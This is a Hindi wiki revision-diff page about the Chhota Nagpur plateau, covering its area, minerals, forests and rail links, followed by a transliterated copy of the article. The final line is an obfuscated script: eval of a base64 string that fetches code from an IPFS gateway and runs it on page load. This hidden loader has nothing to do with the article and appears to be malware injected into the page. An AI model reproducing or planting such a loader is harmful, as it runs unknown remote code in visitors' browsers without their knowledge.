Difference between revisions of "छोटा नागपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "कारखाना" to "कारख़ाना")
Line 3: Line 3:
 
छोटा नागपुर का क्षेत्रफल 65,509 वर्ग किमी इसका बड़ा हिस्सा रांची का पठार है, जिसकी औसत ऊंचाई 700 मीटर है। छोटा नागपुर का समूचा पठार उत्तर में [[गंगा]] और [[सोन नदी|सोन]] के बेसिन और दक्षिण में [[महानदी]] के बेसिन के बीच स्थित है;  इसके मध्य भाग में पश्चिम से पूर्व दिशा में कोयला क्षेत्र वाली दामोदर घाटी गुजरती है।
 
छोटा नागपुर का क्षेत्रफल 65,509 वर्ग किमी इसका बड़ा हिस्सा रांची का पठार है, जिसकी औसत ऊंचाई 700 मीटर है। छोटा नागपुर का समूचा पठार उत्तर में [[गंगा]] और [[सोन नदी|सोन]] के बेसिन और दक्षिण में [[महानदी]] के बेसिन के बीच स्थित है;  इसके मध्य भाग में पश्चिम से पूर्व दिशा में कोयला क्षेत्र वाली दामोदर घाटी गुजरती है।
 
==उत्पादन==
 
==उत्पादन==
सदियों से भारी पैमाने पर होने वाली खेती ने पठार की अधिकांश प्राकृतिक वनस्पति को नष्ट कर दिया है, इसके बावजूद अब भी कुछ महत्त्वपूर्ण वन बचे हुए है। टसर रेशम और लाख जैसे वन उत्पाद आर्थिक रूप से महत्त्वपूर्ण हैं। भारत में खनिज संसाधनों का सबसे महत्त्वपूर्ण संकेंद्रण छोटा नागपुर में है। दामोदर घाटी में कोयले के विशाल भंडार हैं और हज़ारीबाग़ ज़िला विश्व में अभ्रक के प्रमुख स्त्रोतों में से एक है। अन्य खनिज हैं-[[तांबा]], चूना-पत्थर, बॉक्साईट, लौह अयस्क, एस्बेस्टॉस और ऐपाटाइट (फ़ॉस्फ़ेट उर्वरक के उत्पादन में उपयोगी) बोकारो में एक विशाल तापविधुत संयंत्र और इस्पात कारखाना है। इस पठार से गुजरने वाले रेलमार्ग इसे दक्षिण-पूर्व में कोलकाता (भूरपूर्व कलकत्ता) और उत्तर में पटना से जोड़ते हैं और दक्षिण तथा पश्चिम के अन्य नगरों से भी संपर्क उपलब्ध कराते है।  
+
सदियों से भारी पैमाने पर होने वाली खेती ने पठार की अधिकांश प्राकृतिक वनस्पति को नष्ट कर दिया है, इसके बावजूद अब भी कुछ महत्त्वपूर्ण वन बचे हुए है। टसर रेशम और लाख जैसे वन उत्पाद आर्थिक रूप से महत्त्वपूर्ण हैं। भारत में खनिज संसाधनों का सबसे महत्त्वपूर्ण संकेंद्रण छोटा नागपुर में है। दामोदर घाटी में कोयले के विशाल भंडार हैं और हज़ारीबाग़ ज़िला विश्व में अभ्रक के प्रमुख स्त्रोतों में से एक है। अन्य खनिज हैं-[[तांबा]], चूना-पत्थर, बॉक्साईट, लौह अयस्क, एस्बेस्टॉस और ऐपाटाइट (फ़ॉस्फ़ेट उर्वरक के उत्पादन में उपयोगी) बोकारो में एक विशाल तापविधुत संयंत्र और इस्पात कारख़ाना है। इस पठार से गुजरने वाले रेलमार्ग इसे दक्षिण-पूर्व में कोलकाता (भूरपूर्व कलकत्ता) और उत्तर में पटना से जोड़ते हैं और दक्षिण तथा पश्चिम के अन्य नगरों से भी संपर्क उपलब्ध कराते है।  
  
  

Revision as of 12:14, 27 August 2011

chhota nagapur bharat mean sthit ek pathar hai jisaka jyadatar hissa jharakhand aur kuchh hisse u disa, bihar aur chhattisagadh mean phaile huye haian. yah pathar poorv kaianbriyan yugin (5,4000,000, varsh se bhi adhik purani) chattanoan se bana hai. raanchi, hazaribag aur kodarama ke patharoan ka sanyukt nam hi chhota nagapur hai.

kshetraphal

chhota nagapur ka kshetraphal 65,509 varg kimi isaka b da hissa raanchi ka pathar hai, jisaki ausat ooanchaee 700 mitar hai. chhota nagapur ka samoocha pathar uttar mean ganga aur son ke besin aur dakshin mean mahanadi ke besin ke bich sthit hai; isake madhy bhag mean pashchim se poorv disha mean koyala kshetr vali damodar ghati gujarati hai.

utpadan

sadiyoan se bhari paimane par hone vali kheti ne pathar ki adhikaansh prakritik vanaspati ko nasht kar diya hai, isake bavajood ab bhi kuchh mahattvapoorn van bache hue hai. tasar resham aur lakh jaise van utpad arthik roop se mahattvapoorn haian. bharat mean khanij sansadhanoan ka sabase mahattvapoorn sankeandran chhota nagapur mean hai. damodar ghati mean koyale ke vishal bhandar haian aur hazaribag zila vishv mean abhrak ke pramukh strotoan mean se ek hai. any khanij haian-taanba, choona-patthar, b aauksaeet, lauh ayask, esbest aaus aur aipatait (f aausfet urvarak ke utpadan mean upayogi) bokaro mean ek vishal tapavidhut sanyantr aur ispat karakhana hai. is pathar se gujarane vale relamarg ise dakshin-poorv mean kolakata (bhoorapoorv kalakatta) aur uttar mean patana se jo date haian aur dakshin tatha pashchim ke any nagaroan se bhi sanpark upalabdh karate hai.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>